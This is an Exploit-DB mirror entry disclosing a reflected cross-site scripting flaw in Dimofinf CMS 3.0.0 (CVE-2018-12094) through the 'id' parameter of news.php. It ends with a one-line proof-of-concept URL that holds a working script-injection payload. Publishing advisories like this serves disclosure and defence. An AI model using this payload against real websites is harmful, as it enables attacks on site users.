exploit-db-mirror/exploits/php/webapps/44897.txt
Offensive Security 329d5722a0 DB: 2018-06-16
3 changes to exploits/shellcodes

Soroush IM Desktop app 0.15 - Authentication Bypass
OEcms 3.1 - Cross-Site Scripting
Dimofinf CMS 3.0.0 - Cross-Site Scripting
2018-06-16 05:01:46 +00:00

11 lines
No EOL
466 B
Text

# Title: Dimofinf CMS 3.0.0 - Cross-Site Scripting
# Author: Felipe "Renzi" Gabriel
# Date: 2018-06-13
# Software: Dimofinf CMS Version 3.0.0
# CVE: CVE-2018-12094
# A Reflected Cross-Site Scripting web vulnerability has been discovered in the "Dimofinf CMS" web-application.
# The vulnerability is located in the 'id' parameter of the`news.php` action GET method request.
# PoC
http://Target/news.php?id=604""</|\><plaintext/onmouseover=prompt(/XSS/)>